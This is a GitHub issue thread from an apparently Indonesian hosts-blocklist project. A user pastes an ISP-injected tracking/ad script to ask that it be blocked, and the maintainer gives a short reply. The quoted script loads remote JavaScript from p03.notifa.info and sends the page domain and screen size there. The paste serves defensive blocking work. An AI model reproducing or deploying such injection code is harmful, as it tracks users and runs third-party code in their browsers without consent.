### ISSUE TITLE
Block tracking/ads injection ISP Indonesia

### ISSUE THREAD

**Issue by manh21** [gvoze32/unblockhostid#470]
Block tracking ISP di Indonesia 

`<script type="text/javascript">
            if (self == top) {
                function netbro_cache_analytics(fn, callback) {
                    setTimeout(function() {
                        fn();
                        callback();
                    }, 0);
                }
                function sync(fn) {
                    fn();
                }
                function requestCfs() {
                    var idc_glo_url = (location.protocol == "https:" ? "https://" : "http://");
                    var idc_glo_r = Math.floor(Math.random() * 99999999999);
                    var url = idc_glo_url + "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2p3bJVpova8v70CLpKHpVw0Fq3IG1JvFB4KMVCTuG8aALmD6kX1C%2fvtad0zAYH59n9c8rtS7jSKHCn84og8r9w6d%2fIHWg1B%2bHU6nR2%2b0tqS5rEjGgoSxv4mnoysi9iOB3o0CPmauW08VatC3NZY26g9YX9ucxiubyDmuM4Oo%2bjt3WJrKWoCJGILDPMSWnD1AAoLcRtmr6yoqZmxcDFZZFCU7BSCCJvLZ97gYh1qqDqiehDbo1Vkfl996aEidwYDECgtDPH71Nfy7LsSo2VBRNGL7K6JDBGDwRgS91I1FYJbFP%2fgiJHfqnOtMRq515sFdHKoroY1QWG%2f2UJVNnL0aQh7p8xT1JoPGTpMwG8prYVnXOkvVIvuCUB4vVVeiE2Fp1U1OkMygOkCMXHf6zr4slPoYndAY2mYJoz8MW3%2b3P7KtmRbbq86CP5ODQFaTEP%2b7SB%2fy4Ezdro%2f106pX%2bJvJnrli2RhfBKVuW8p3gux%2fsFe1b5e6vzH54iTo53%2bMQrgHDL3T%2bOgWw%2fUk7UGJpJ01I%2bktlIKDLWRJZ0tilxlZSYzq8eqyv7RLyu70WNHS7YAEUzaI3nUCZ6hQ%3d" + "&idc_r=" + idc_glo_r + "&domain=" + document.domain + "&sw=" + screen.width + "&sh=" + screen.height;
                    var bsa = document.createElement('script');
                    bsa.type = 'text/javascript';
                    bsa.async = true;
                    bsa.src = url;
                    (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(bsa);
                }
                netbro_cache_analytics(requestCfs, function() {});
            }
            ;</script>`

**Comment by gvoze32** [comment]
Kalau block pake script bukannya pasangnya di browser ya?
